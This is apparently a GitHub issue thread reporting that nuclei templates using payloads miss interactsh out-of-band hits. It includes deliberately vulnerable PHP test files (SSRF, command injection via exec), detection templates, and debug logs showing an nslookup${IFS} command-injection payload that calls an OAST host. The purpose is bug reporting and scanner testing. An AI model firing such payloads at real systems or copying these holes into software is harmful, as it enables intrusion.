search

projectdiscovery / nuclei

Fast and customizable vulnerability scanner based on simple YAML based DSL.
https://docs.projectdiscovery.io/tools/nuclei
MIT License
19.91k stars 2.45k forks source link

Using payloads will cause interactsh to fail #5485

Open pwnhxl opened 1 month ago

pwnhxl commented 1 month ago

Nuclei version:

last

--

When I use payloads together with oast, it results in a miss. Here's an example of the test command I used, along with a yaml template, and a php test.

Nuclei command:


PS C:\> nuclei -t .\ssrf*.yaml -vv -id ssrf-1,ssrf-2 -u http://192.168.0.102/

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.0

                projectdiscovery.io

[WRN] Found 30 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.3.0 (latest)
[INF] Current nuclei-templates version: v9.9.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 2
[WRN] Loading 2 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[ssrf-1] SSRF (@projectdiscoveryai) [high]
[ssrf-2] SSRF (@projectdiscoveryai) [high]
[INF] Using Interactsh Server: oast.live
[ssrf-2] [http] [high] http://192.168.0.102/?url=http://cqnh1md5p36thd453060jstmphscsnj93.oast.live
PS C:\>

index.php
<?php
if (isset($_GET['url'])) {
    $fileContent = file_get_contents($_GET['url']);
    echo $fileContent;
}
?>

id: ssrf-1

info:
  name: SSRF
  author: ProjectDiscoveryAI
  severity: high
  description: |
    This template detects Server Side Request Forgery (SSRF) vulnerabilities where the input parameter is base64 encoded.

http:
  - raw:
      # - |
      #   GET /?password={{password}}&data={{base64("http://{{interactsh-url}}")}} HTTP/1.1
      #   Host: {{Hostname}}

      # - |
      #   GET /?url=http://{{interactsh-url}} HTTP/1.1
      #   Host: {{Hostname}}

      - |
        GET /?password={{password}}&url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      password:
        - admin
        - aaaaa
        - bbbbb

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "dns"

id: ssrf-2

info:
  name: SSRF
  author: ProjectDiscoveryAI
  severity: high
  description: |
    This template detects Server Side Request Forgery (SSRF) vulnerabilities where the input parameter is base64 encoded.

http:
  - raw:
      # - |
      #   GET /?password={{password}}&data={{base64("http://{{interactsh-url}}")}} HTTP/1.1
      #   Host: {{Hostname}}

      # - |
      #   GET /?url=http://{{interactsh-url}} HTTP/1.1
      #   Host: {{Hostname}}

      - |
        GET /?url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    # payloads:
    #   password:
    #     - admin
    #     - aaaaa
    #     - bbbbb

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "dns"
pwnhxl commented 1 month ago

Both ssrf-1.yaml and ssrf-2.yaml send url=http://{{interactsh-url}} but ssrf-1.yaml fails to detect because ssrf-1.yaml uses a payload.

pwnhxl commented 1 month ago

@tarunKoyalwar

dwisiswant0 commented 1 month ago

Confirmed.

k1rnt commented 2 weeks ago

I am also experiencing the same issue. I will leave the logs below, and I hope they might be helpful.

nuclei version

v3.3.1

test

vuln environment start

vuln.php

<?php
# vuln.php
$command = (!isset($_GET['command']) || $_GET['command'] === '')
    ? 'ls'
    : $_GET['command'];
exec($command);
?>

start vuln.php

php -S 0.0.0.0:8888 ./vuln.php

detect nuclei template log

detect.yaml

# detect.yaml
id: detect

info:
  name: OOB OS Command injection
  author: k1rnt
  severity: High
  description: A template for detecting OS command injection using Out-of-Band (OOB) techniques.

http:
  - raw:
    - |
        GET /?command=nslookup${IFS}{{interactsh-url}} HTTP/1.1
    matchers:
      - name: A DNS request was sent to an external URL.
        type: word
        part: interactsh_protocol
        words:
          - "dns"

Execution command

nuclei -t ./detect.yaml -u "http://localhost:8888" -p "http://localhost:8080" --debug

Execution result

nuclei -t ./detect.yaml -u "http://localhost:8888" -p "http://localhost:8080" --debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.1

                projectdiscovery.io

[INF] Current nuclei version: v3.3.1 (latest)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [detect] Dumped HTTP request for http://localhost:8888/?command=nslookup${IFS}cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live

GET /?command=nslookup${IFS}cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/618.6 (KHTML, like Gecko) Version/17.2 Safari/618.6
Connection: close
Accept-Encoding: gzip

[DBG] [detect] Dumped HTTP response http://localhost:8888/?command=nslookup${IFS}cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Mon, 26 Aug 2024 08:07:24 GMT
Host: localhost:8888
X-Powered-By: PHP/8.3.10

[cr63feqhc8a54hnmtj306rb8uy4cqkiw7] Received DNS interaction from 163.139.8.231 at 2024-08-26 08:07:28
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 16796
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags:; udp: 1232

;; QUESTION SECTION:
;cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.   IN       A

------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 16796
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.   IN       A

;; ANSWER SECTION:
cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.    3600    IN      A       178.128.210.172

;; AUTHORITY SECTION:
cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.    3600    IN      NS      ns1.oast.live.
cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.    3600    IN      NS      ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.  3600    IN      A       178.128.210.172
ns2.oast.live.  3600    IN      A       178.128.210.172

[detect:A DNS request was sent to an external URL.] [http] [high] http://localhost:8888/?command=nslookup${IFS}cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live

burp screenshot

image

no detect nuclei template log

no_detect.yaml

# no detect.yaml
id: no_detect

info:
  name: OOB OS Command injection
  author: k1rnt
  severity: High
  description: A template for detecting OS command injection using Out-of-Band (OOB) techniques.

http:
  - raw:
    - |
        GET /?command=§pattern§ HTTP/1.1
    payloads:
      pattern:
        - "nslookup${IFS}.{{interactsh-url}}"
    matchers:
      - name: A DNS request was sent to an external URL.
        type: word
        part: interactsh_protocol
        words:
          - "dns"

Execution command

nuclei -t ./no_detect.yaml -u "http://localhost:8888" -p "http://localhost:8080" --debug

Execution result

nuclei -t ./no_detect.yaml -u "http://localhost:8888" -p "http://localhost:8080" --debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.1

                projectdiscovery.io

[INF] Current nuclei version: v3.3.1 (latest)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.site
[INF] [no_detect] Dumped HTTP request for http://localhost:8888/?command=nslookup${IFS}.cr63gfihc8a56pe5fkr039xjexhqa7jgb.oast.site

GET /?command=nslookup${IFS}.cr63gfihc8a56pe5fkr039xjexhqa7jgb.oast.site HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept-Encoding: gzip

[DBG] [no_detect] Dumped HTTP response http://localhost:8888/?command=nslookup${IFS}.cr63gfihc8a56pe5fkr039xjexhqa7jgb.oast.site

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Mon, 26 Aug 2024 08:09:35 GMT
Host: localhost:8888
X-Powered-By: PHP/8.3.10

[INF] No results found. Better luck next time!

burp screenshot

image